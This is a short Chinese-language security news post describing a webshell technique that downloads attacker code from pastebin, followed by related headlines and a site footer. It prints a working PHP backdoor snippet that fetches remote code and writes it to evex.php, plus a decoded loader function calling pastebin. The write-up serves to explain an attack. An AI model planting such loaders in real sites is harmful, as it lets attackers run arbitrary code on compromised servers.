這兩天某國外黑客寫了一篇文章關(guān)于他發(fā)現(xiàn)的一種webshell中使用的手法,大體說說思路,原文就不翻譯了,我懶。
簡單來說就是通過一個很簡單的代碼遠(yuǎn)程通過pastebin下載代碼并且執(zhí)行。
if(array_keys($_GET)[0] == 'up'){
$content = file_get_contents("http:// pastebin . com/raw.php?i=JK5r7NyS");
if($content){unlink('evex.php');
$fh2 = fopen("evex.php", 'a');
fwrite($fh2,$content);
fclose($fh2);
}}else{print "test";}
pastebin是一個國外黑客,程序員經(jīng)常分享資源,種子,代碼的地方。經(jīng)常從國外獲取資源的同學(xué)應(yīng)該會知道經(jīng)常有黑客把自己黑來的數(shù)據(jù)庫直接放上面進(jìn)行共享。pastebin允許用戶下載原始格式的代碼文件,就是說黑客可以使用后門直接下載其他黑客共享的后門,或者給網(wǎng)站植入存在漏洞的網(wǎng)頁。
這是其中一個例子,代碼已經(jīng)經(jīng)過解碼。
還有一件事就是印度尼西亞某sb特地制作了pastebin編碼器
上面的代碼解碼后的結(jié)果。
function FathurFreakz($ct3){
xcurl('http:// pastebin.com/download.php?i='.code($ct3));
}
FathurFreakz(CODE);
總之要給出一個結(jié)論就是,像github pastebin這種充斥著數(shù)據(jù)和方便的功能的網(wǎng)站正在越來越多的被黑客利用。
國產(chǎn)工具PKAV HTTP Fuzzer滲透測試助手最新發(fā)布
閱讀惠普漏洞:惠普ArcSight企業(yè)安全系列產(chǎn)品曝高危安全漏洞
閱讀蘋果Mac OS X系統(tǒng)被發(fā)現(xiàn)存在DLL劫持漏洞
閱讀D-Link(友訊)路由器曝遠(yuǎn)程文件上傳及命令注入漏洞(已發(fā)布安全更新)
閱讀Win10將使用P2P進(jìn)行系統(tǒng)更新,引發(fā)安全擔(dān)憂
閱讀美國最大的無卡ATM網(wǎng)絡(luò)即將推出,從此告別刷卡!
閱讀谷歌應(yīng)用漏洞泄漏超過28萬條私人WHOIS數(shù)據(jù)
閱讀使命召喚、魔獸世界、英雄聯(lián)盟……專攻游戲的勒索軟件TeslaCrypt
閱讀本站所有軟件,都由網(wǎng)友上傳,如有侵犯你的版權(quán),請發(fā)郵件[email protected]
湘ICP備2022002427號-10 湘公網(wǎng)安備:43070202000427號© 2013~2025 haote.com 好特網(wǎng)